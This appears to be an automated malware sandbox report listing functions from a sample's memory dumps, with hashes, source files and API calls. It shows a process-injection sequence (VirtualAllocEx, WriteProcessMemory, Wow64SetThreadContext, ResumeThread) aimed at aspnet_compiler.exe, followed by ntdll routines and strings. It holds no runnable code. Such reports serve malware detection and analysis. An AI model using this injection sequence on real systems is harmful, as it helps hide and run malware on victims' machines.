Opcode ID: 6688fe7c6f58f6013d87fca9dc9e0ad151bfd5f55601ee466fa8166e71b23e6c
Instruction ID: 2946f3119b18f4cfd5283b8a7291ac3df4d202c6af5a99237c5ed2c8bde93701
Opcode Fuzzy Hash: 6688fe7c6f58f6013d87fca9dc9e0ad151bfd5f55601ee466fa8166e71b23e6c
Instruction Fuzzy Hash: 982148B69002499FCB10CFA9D885BDEBBF0FF48314F10852EE519A7240D374A944CFA0

Function 00BC2244 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00BC3E6D

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2192b9ff6d623ec95c81288cbff48b00b5e68a215a3838e4cb8655c2cf10822a
Instruction ID: 74fd8cf0fed88330c6f4984ad01d3e92aab08251d2abc59fe67385c88d5f6cd9
Opcode Fuzzy Hash: 2192b9ff6d623ec95c81288cbff48b00b5e68a215a3838e4cb8655c2cf10822a
Instruction Fuzzy Hash: 8A211575900649DFCB10CF99D885BDEBBF4FB48710F50852EE919A7240D374AA44CBA4

Function 00BC3C50 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00BC3CD7

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fa41bfb8fa2875733dff6b607080c84ecca3a8cb558450510e7ab7ed63c96f94
Instruction ID: c216b97c2ab827502cb9be007f2509bb8c5ea1d804ac3c4b6d390f3de9020136
Opcode Fuzzy Hash: fa41bfb8fa2875733dff6b607080c84ecca3a8cb558450510e7ab7ed63c96f94
Instruction Fuzzy Hash: 442105B6800349DFCB10CF99D884ADEBBF4FF48314F51842AE558A7250D375AA44CBA1

Function 00BC2220 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00BC3CD7

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3bc97653a26c539db44f0a3692b1a3450daa230744d40288c9cd2eaa9b4a07c9
Instruction ID: 88921c0e592d85e4decb98efec0521a3d2085f9deee2a2ae30ca2a3c74420c2c
Opcode Fuzzy Hash: 3bc97653a26c539db44f0a3692b1a3450daa230744d40288c9cd2eaa9b4a07c9
Instruction Fuzzy Hash: AD211475900749DFCB10CF9AD884BDEBBF4FF48310F50842AE918A7250D375A944CBA0

Function 00BC2208 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0254AB1C,00000000), ref: 00BC3C07

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1ed2c97b667de571ec11983d4ea6d3406f768ebabc0f25f0950a7608f4224282
Instruction ID: e9d5fd58c5841585237eb7dd94436a0e01e6dfc9527221390cc00662a83237d5
Opcode Fuzzy Hash: 1ed2c97b667de571ec11983d4ea6d3406f768ebabc0f25f0950a7608f4224282
Instruction Fuzzy Hash: DB2134B1D006199BCB10CF9AD884BAEFBF4FB48710F50816AD918B7240D379A944CFE0

Function 00BC2250 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0254AB1C,00000000), ref: 00BC3C07

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 59b7e83631c8c55e0450a2c6c5e60f3c90bfa931c11afd0542daa395dc12854c
Instruction ID: 7a25a29cc46f6f7902c9ec514cd3544c67e1e6022029b311c1b1cf35bb6da85b
Opcode Fuzzy Hash: 59b7e83631c8c55e0450a2c6c5e60f3c90bfa931c11afd0542daa395dc12854c
Instruction Fuzzy Hash: AF213471D006199BCB10CF9AD884BAEFBF4FB48710F54816AD818B7240D378A9448FA0

Function 00BC3B89 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0254AB1C,00000000), ref: 00BC3C07

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8002440fd77fbc0d07a60706103b273474ad24a4baa675f6d279614172cf224a
Instruction ID: c786d053243ee76eb815c9f29c5db7410a15a459ee54c3b6cd922449895654ac
Opcode Fuzzy Hash: 8002440fd77fbc0d07a60706103b273474ad24a4baa675f6d279614172cf224a
Instruction Fuzzy Hash: A3213971D006599FCB10CFAAD445B9EFBF4BB48714F55816ED418B7240D3785944CFA1

Function 00BC2238 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00BC3D93

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fbd91d6ce0c5f764376bdbc15e18fa9cbd0ca0dda3fabd74c2dcaa6e5aeddd1
Instruction ID: 8b089b476e56bf2d0509cd0f6b36d0b4c67894919c89f538031e04a78b0978df
Opcode Fuzzy Hash: 1fbd91d6ce0c5f764376bdbc15e18fa9cbd0ca0dda3fabd74c2dcaa6e5aeddd1
Instruction Fuzzy Hash: E7112375900648DFCB10DF9AD888BDEBBF4FF88714F10846AE519A7210D375A944CFA0

Function 00BC3D20 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00BC3D93

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d61979f69e6dce0417449432a2e5ae36127305dbc4ccfc9a6f47d5b20b839e50
Instruction ID: a336496b3069cffeb69eaa1054d8c1af3b83a7fa880df1bf783cf68d373a000d
Opcode Fuzzy Hash: d61979f69e6dce0417449432a2e5ae36127305dbc4ccfc9a6f47d5b20b839e50
Instruction Fuzzy Hash: 671164B6800608CFDB10CF99D888BDEBBF4FF88314F108459E518A7210D335AA44CFA0

Function 00BC3EB9 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(0254AB1C), ref: 00BC3F1F

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6385b5f89f290f174c52fb69e60119e5a0499e95835fb2c29973f03bbdfc9cf6
Instruction ID: 1715c1981d6444380fd337578670367431462586f2d8f0c2c8c5e926f913410d
Opcode Fuzzy Hash: 6385b5f89f290f174c52fb69e60119e5a0499e95835fb2c29973f03bbdfc9cf6
Instruction Fuzzy Hash: B81143B18003488FDB10DFA9D849B9EBBF4EF88724F20845AD518A7250D374A945CFA0

Function 00BC2268 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(0254AB1C), ref: 00BC3F1F

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e20319abe5f28ba70898fe4fe715bd150c052538cba2482babab9432ce6c4a63
Instruction ID: a56253915afc006eaab05f18b8c3d3b1b782845265b75c45e2ffc982d4790e2c
Opcode Fuzzy Hash: e20319abe5f28ba70898fe4fe715bd150c052538cba2482babab9432ce6c4a63
Instruction Fuzzy Hash: C81125B1800649CFCB10DF9AD888BDEFBF4EB88714F24845AD519A7250D775A944CFA4

Function 0082D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2439940458.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_82d000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d747196f728fdbee43de922a397f7e232428390e6deaf9758410427fd996ee78
Instruction ID: e24be62b79d086d6b7a9c06bb3e5b401e69270338e1a48692a9300545c2be2c3
Opcode Fuzzy Hash: d747196f728fdbee43de922a397f7e232428390e6deaf9758410427fd996ee78
Instruction Fuzzy Hash: 8501D671104368DEE7208B25ED84B66FFD8FF41768F18C41AED099A282C77C9881C6B1

Function 0082D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2439940458.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_82d000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66c86150630b32b0a335deaa896c3091175a2f60761d6e8b2628e001a1f0c1d
Instruction ID: cb8576ed3289e829ed68da6516dd0410b69add016e887a7b8915fc362ae446fa
Opcode Fuzzy Hash: d66c86150630b32b0a335deaa896c3091175a2f60761d6e8b2628e001a1f0c1d
Instruction Fuzzy Hash: F0F06271404354AEE7108A15EC84B62FF98FB51724F18C55AED485B686C3799C45CAB1

Non-executed Functions

Function 00BC2B19 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf73d704312dce80364c61e2183ff1169e639b249f7b439e62836a6355cafbe
Instruction ID: d3b89bbc1681e559de81b311aa3b78eaae71bc8ac8e93cbc5b2f9a948ad38f0f
Opcode Fuzzy Hash: 8bf73d704312dce80364c61e2183ff1169e639b249f7b439e62836a6355cafbe
Instruction Fuzzy Hash: C721AAB1D056288BEB19CF678C047DAFAF7AFC9300F04C1BAC408A6254DB740A86CF51

Function 00BC2B17 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffca03464be6912a282be0d792fccc5a537c457dd77bb4e2e3da5caf3371188c
Instruction ID: f344978556b7ad359f242c5f271c04cae6a5bc8f76fbbea3b677662702a9d6b0
Opcode Fuzzy Hash: ffca03464be6912a282be0d792fccc5a537c457dd77bb4e2e3da5caf3371188c
Instruction Fuzzy Hash: 8C2148B1D056288BEB18CF678D447D9FAF3BFC8305F14C1AAC408A6214DB740A86CF04

Analysis Process: aspnet_compiler.exePID: 6840, Parent PID: 6736COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	9.3%
Total number of Nodes:	97
Total number of Limit Nodes:	8

Executed Functions

Function 00417663 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
Instruction ID: d3f44e460cc280bd8e551566dc012685ef73f4a32ffc8664677e37c5d98fc3a0
Opcode Fuzzy Hash: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
Instruction Fuzzy Hash: 26015EB1E0020DBBDB10DBE5DC42FDEB7789B14308F4081AAE90897241FA34EB488B95

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4

Function 01A235C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A235CA

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
Instruction ID: 4edfbe1804ddd4bce89d2e671a3b0c2bd784bc7093c74cd41477dff196d881e5
Opcode Fuzzy Hash: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
Instruction Fuzzy Hash: 58900231A0550402D10071584514706101597D0201F66C511B0428568DC7998A5276A2

Function 01A22DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A22DFA

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
Instruction ID: d40e5ee7e6567211ce72c3aa3f8f2c7671f41eb231b616248e0bec625adc96e5
Opcode Fuzzy Hash: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
Instruction Fuzzy Hash: 4090023160140413D11171584504707001997D0241F96C512B0428558DD65A8A53B221

Function 01A22C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A22C7A

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
Instruction ID: a7af68e280d3668a7584b7941adeffe58d976fd3bf3b5a4b0198f80521615792
Opcode Fuzzy Hash: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
Instruction Fuzzy Hash: 1690023160148802D1107158840474A001597D0301F5AC511B4428658DC69989927221

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042C957

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction Fuzzy Hash: 0AE026353102007BD510FA5ADC01F97775CDFC5710F400419FA487B242C671790083F1

Function 00417656 Relevance: 1.5, APIs: 1, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5

Memory Dump Source

Source File: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
Instruction ID: cf65e461030a38222c57f55313a0619b2327d6594293c5b5006fcba462ae1fac
Opcode Fuzzy Hash: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
Instruction Fuzzy Hash: 42E048B5E0410AABDF00CF98CC41F9EB7B8AB54304F008196E84CD6241F574F659C755

Function 01A22C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A22C24

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
Instruction ID: bea7e14b897860535c0148af998dd2fca7d218b9228ed5d5213523b5794349a9
Opcode Fuzzy Hash: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
Instruction Fuzzy Hash: 15B09B71D015D5C5DA11E7644608717791077D0701F16C172F2034741F473CC5D1F275

Non-executed Functions

Function 01A62349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

DisableExceptionChainValidation, xrefs: 01A6275F
FrontEndHeapDebugOptions, xrefs: 01A62489
@, xrefs: 01A62942
CFGOptions, xrefs: 01A62967
MinimumStackCommitInBytes, xrefs: 01A62BB0
LdrpInitializeExecutionOptions, xrefs: 01A6317D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A63176
ShutdownFlags, xrefs: 01A624A1
UseImpersonatedDeviceMap, xrefs: 01A6251C
@, xrefs: 01A62B74
UnloadEventTraceDepth, xrefs: 01A624C0
MaxLoaderThreads, xrefs: 01A624EC
MaxDeadActivationContexts, xrefs: 01A62D82
ExecuteOptions, xrefs: 01A625A0
GlobalFlag2, xrefs: 01A62FC0
minkernel\ntdll\ldrinit.c, xrefs: 01A63187
DisableHeapLookaside, xrefs: 01A6246D
GlobalFlag, xrefs: 01A62F3F, 01A63059
RaiseExceptionOnPossibleDeadlock, xrefs: 01A62579
TracingFlags, xrefs: 01A62549

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
Instruction ID: 5488dde0dd373dcc2350bfb6eab631f7460f30a87ffdc8dc7293d06694eeb1b9
Opcode Fuzzy Hash: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
Instruction Fuzzy Hash: CE927E71604742ABE721DF28C880B6BBBE8FF84750F04492EFA99D7251D774E845CB92

Function 01A912ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 01A9186B
HEAP: , xrefs: 01A91706, 01A91756, 01A917A8, 01A91809, 01A9184D, 01A91895, 01A918E6
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 01A918F8
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 01A918A5
Heap block at %p has incorrect segment offset (%x), xrefs: 01A9181A
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 01A9176D
Heap block at %p is not last block in segment (%p), xrefs: 01A917B7
Free Heap block %p modified at %p after it was freed, xrefs: 01A9171B
HEAP[%wZ]: , xrefs: 01A916CD, 01A916F9, 01A91749, 01A9179B, 01A917FC, 01A91840, 01A918D9

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 22e8d9122d0cc1dfdfd0e1b49ffd0cf64102454f0988b11a97ccf46e5d68103e
Instruction ID: a7599c1988867ba772f54f927a5cb28009e82a1aa6720ff956d59e70799315fa
Opcode Fuzzy Hash: 22e8d9122d0cc1dfdfd0e1b49ffd0cf64102454f0988b11a97ccf46e5d68103e
Instruction Fuzzy Hash: C012B174600643DFDB268F29C481BBABBF1FF49724F19845DE58A8B642D734E881CB90

Function 019DD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

Control Panel\Desktop\MuiCached, xrefs: 019DD62B
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 019DD3B6
@, xrefs: 019DD3E9
Control Panel\Desktop, xrefs: 019DD45D
@, xrefs: 019DD49D
PreferredUILanguages, xrefs: 019DD4B8, 019DD4C5
MachinePreferredUILanguages, xrefs: 019DD685
@, xrefs: 019DD663
PreferredUILanguagesPending, xrefs: 01A3A8DE

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 4a2991c60c6df3b29ac26e09812d132b7354d1c6167ff6aadc46e8eacaed3d75
Instruction ID: a660004b9aa59314d7285f906dd448bace2c1147596cbe82e8a74f2111996b0e
Opcode Fuzzy Hash: 4a2991c60c6df3b29ac26e09812d132b7354d1c6167ff6aadc46e8eacaed3d75
Instruction Fuzzy Hash: 23B18E719083569FD721DF68C580B6BBBE8BF88754F41892EF989D7280D730D944CB92

Function 01A79179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

BaseNamedObjects, xrefs: 01A79477, 01A7947C
%s\%u-%u-%u-%u, xrefs: 01A79422
\AppContainerNamedObjects, xrefs: 01A794AB, 01A794B9
%s\%ld\%s, xrefs: 01A7948D
Global\Session\%ld%s, xrefs: 01A794C5
AppContainerNamedObjects, xrefs: 01A7946E, 01A794D6
\BaseNamedObjects, xrefs: 01A7949E
\Sessions, xrefs: 01A79488

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

